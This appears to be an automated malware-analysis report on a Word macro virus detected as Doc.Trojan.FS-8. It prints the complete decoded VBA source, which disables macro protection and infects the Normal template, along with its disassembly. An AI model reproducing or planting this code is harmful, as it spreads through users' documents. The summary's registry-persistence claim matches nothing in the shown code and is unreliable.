Office (OLE) malware analysis — malicious · f3cc81b3502ffdfc

MALICIOUS

Office (OLE)

26.5 KB Created: 1999-07-17 18:01:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 196d6e68397a4c19ae26e313ab8ea456 SHA-1: c39977029db572b8b8819daf8798f391e945fe5c SHA-256: f3cc81b3502ffdfce75956732eca6d5a4739d9761d29e514f7a38297834115fc

128 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains a VBA macro that executes upon document close. This macro writes a new macro to the Normal template, which will execute when a new document is opened. The macro attempts to write to the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy, likely to establish persistence. The ClamAV detection 'Doc.Trojan.FS-8' and the presence of a Document_Open macro further indicate malicious intent.

Heuristics 4

ClamAV: Doc.Trojan.FS-8 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.FS-8
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3933 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3933 bytes
SHA-256: `d241870e29c1cd19141edfd9fd43344dbbedad09d10e096d4f6d3abd1d8d1c8b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Copyright (C) 1998 by FlyShadow ~^^~ - Plural Private Sub Document_Close() On Error Resume Next: γ = Environ("WINDIR") & ".\TEMP\" Options.VirusProtection = 0: Options.SaveNormalPrompt = 0 η = FreeFile: Open γ & "&" For Output As #η Print #η, VBProject.VBComponents(1).CodeModule.Lines(1, 20) Close #η: Open γ & "&&" For Output As #η Print #η, "Private Sub Document_Open()" Print #η, "On Error Resume Next: γ = Environ(" & Chr(34) & "WINDIR" & Chr(34) & ")" & "&" & Chr(34) & ".\TEMP\" & Chr(34) Print #η, "Set ι = ActiveDocument.VBProject.VBComponents(1).Codemodule" Print #η, "ι.Deletelines 1, ι.CountOfLines" Print #η, "ι.AddFromFile (γ & " & Chr(34) & "&" & Chr(34) & ")" Print #η, "End Sub": Close #η Set ι = NormalTemplate.VBProject.VBComponents(1).CodeModule ι.Deletelines 1, ι.CountOfLines: ι.AddFromFile (γ & "&&") End Sub ' Processing file: /opt/analyzer/scan_staging/815b6edd03494174a55148f15239843c.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 2451 bytes ' Line #0: ' QuoteRem 0x0000 0x002D "Copyright (C) 1998 by FlyShadow ~^^~ - Plural" ' Line #1: ' FuncDefn (Private Sub Document_Close()) ' Line #2: ' OnError (Resume Next) ' BoS 0x0000 ' LitStr 0x0006 "WINDIR" ' ArgsLd Environ 0x0001 ' LitStr 0x0007 ".\TEMP\" ' Concat ' St γ ' Line #3: ' LitDI2 0x0000 ' Ld Options ' MemSt VirusProtection ' BoS 0x0000 ' LitDI2 0x0000 ' Ld Options ' MemSt SaveNormalPrompt ' Line #4: ' Ld Friend ' St η ' BoS 0x0000 ' Ld γ ' LitStr 0x0001 "&" ' Concat ' Ld η ' Sharp ' LitDefault ' Open (For Output) ' Line #5: ' Ld η ' Sharp ' PrintChan ' LitDI2 0x0001 ' LitDI2 0x0014 ' LitDI2 0x0001 ' Ld VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' ArgsMemLd Lines 0x0002 ' PrintItemNL ' Line #6: ' Ld η ' Sharp ' Close 0x0001 ' BoS 0x0000 ' Ld γ ' LitStr 0x0002 "&&" ' Concat ' Ld η ' Sharp ' LitDefault ' Open (For Output) ' Line #7: ' Ld η ' Sharp ' PrintChan ' LitStr 0x001B "Private Sub Document_Open()" ' PrintItemNL ' Line #8: ' Ld η ' Sharp ' PrintChan ' LitStr 0x0023 "On Error Resume Next: γ = Environ(" ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0006 "WINDIR" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0001 ")" ' Concat ' LitStr 0x0001 "&" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0007 ".\TEMP\" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' PrintItemNL ' Line #9: ' Ld η ' Sharp ' PrintChan ' LitStr 0x003C "Set ι = ActiveDocument.VBProject.VBComponents(1).Codemodule" ' PrintItemNL ' Line #10: ' Ld η ' Sharp ' PrintChan ' LitStr 0x0021 "ι.Deletelines 1, ι.CountOfLines" ' PrintItemNL ' Line #11: ' Ld η ' Sharp ' PrintChan ' LitStr 0x0015 "ι.AddFromFile (γ & " ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0001 "&" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0001 ")" ' Concat ' PrintItemNL ' Line #12: ' Ld η ' Sharp ' PrintChan ' LitStr 0x0007 "End Sub" ' PrintItemNL ' BoS 0x0000 ' Ld η ' Sharp ' Close 0x0001 ' Line #13: ' SetStmt ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' Set ι ' Line #14: ' LitDI2 0x0001 ' Ld ι ' MemLd CountOfLines ' Ld ι ' ArgsMemCall Deletelines 0x0002 ' BoS 0x0000 ' Ld γ ' LitStr 0x0002 "&&" ' Concat ' Paren ' Ld ι ' ArgsMemCall AddFromFile 0x0001 ' Line #15: ' EndSub

SHA-256: d241870e29c1cd19141edfd9fd43344dbbedad09d10e096d4f6d3abd1d8d1c8b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - Plural
Private Sub Document_Close()
On Error Resume Next: γ = Environ("WINDIR") & ".\TEMP\"
Options.VirusProtection = 0: Options.SaveNormalPrompt = 0
η = FreeFile: Open γ & "&" For Output As #η
Print #η, VBProject.VBComponents(1).CodeModule.Lines(1, 20)
Close #η: Open γ & "&&" For Output As #η
Print #η, "Private Sub Document_Open()"
Print #η, "On Error Resume Next: γ = Environ(" & Chr(34) & "WINDIR" & Chr(34) & ")" & "&" & Chr(34) & ".\TEMP\" & Chr(34)
Print #η, "Set ι = ActiveDocument.VBProject.VBComponents(1).Codemodule"
Print #η, "ι.Deletelines 1, ι.CountOfLines"
Print #η, "ι.AddFromFile (γ & " & Chr(34) & "&" & Chr(34) & ")"
Print #η, "End Sub": Close #η
Set ι = NormalTemplate.VBProject.VBComponents(1).CodeModule
ι.Deletelines 1, ι.CountOfLines: ι.AddFromFile (γ & "&&")
End Sub

' Processing file: /opt/analyzer/scan_staging/815b6edd03494174a55148f15239843c.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 2451 bytes
' Line #0:
' 	QuoteRem 0x0000 0x002D "Copyright (C) 1998 by FlyShadow ~^^~ - Plural"
' Line #1:
' 	FuncDefn (Private Sub Document_Close())
' Line #2:
' 	OnError (Resume Next) 
' 	BoS 0x0000 
' 	LitStr 0x0006 "WINDIR"
' 	ArgsLd Environ 0x0001 
' 	LitStr 0x0007 ".\TEMP\"
' 	Concat 
' 	St γ 
' Line #3:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt VirusProtection 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #4:
' 	Ld Friend 
' 	St η 
' 	BoS 0x0000 
' 	Ld γ 
' 	LitStr 0x0001 "&"
' 	Concat 
' 	Ld η 
' 	Sharp 
' 	LitDefault 
' 	Open (For Output)
' Line #5:
' 	Ld η 
' 	Sharp 
' 	PrintChan 
' 	LitDI2 0x0001 
' 	LitDI2 0x0014 
' 	LitDI2 0x0001 
' 	Ld VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	PrintItemNL 
' Line #6:
' 	Ld η 
' 	Sharp 
' 	Close 0x0001 
' 	BoS 0x0000 
' 	Ld γ 
' 	LitStr 0x0002 "&&"
' 	Concat 
' 	Ld η 
' 	Sharp 
' 	LitDefault 
' 	Open (For Output)
' Line #7:
' 	Ld η 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x001B "Private Sub Document_Open()"
' 	PrintItemNL 
' Line #8:
' 	Ld η 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0023 "On Error Resume Next: γ = Environ("
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0006 "WINDIR"
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0001 ")"
' 	Concat 
' 	LitStr 0x0001 "&"
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0007 ".\TEMP\"
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	PrintItemNL 
' Line #9:
' 	Ld η 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x003C "Set ι = ActiveDocument.VBProject.VBComponents(1).Codemodule"
' 	PrintItemNL 
' Line #10:
' 	Ld η 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0021 "ι.Deletelines 1, ι.CountOfLines"
' 	PrintItemNL 
' Line #11:
' 	Ld η 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0015 "ι.AddFromFile (γ & "
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0001 "&"
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0001 ")"
' 	Concat 
' 	PrintItemNL 
' Line #12:
' 	Ld η 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0007 "End Sub"
' 	PrintItemNL 
' 	BoS 0x0000 
' 	Ld η 
' 	Sharp 
' 	Close 0x0001 
' Line #13:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set ι 
' Line #14:
' 	LitDI2 0x0001 
' 	Ld ι 
' 	MemLd CountOfLines 
' 	Ld ι 
' 	ArgsMemCall Deletelines 0x0002 
' 	BoS 0x0000 
' 	Ld γ 
' 	LitStr 0x0002 "&&"
' 	Concat 
' 	Paren 
' 	Ld ι 
' 	ArgsMemCall AddFromFile 0x0001 
' Line #15:
' 	EndSub

Open this report in the interactive analyzer, or submit your own file for analysis.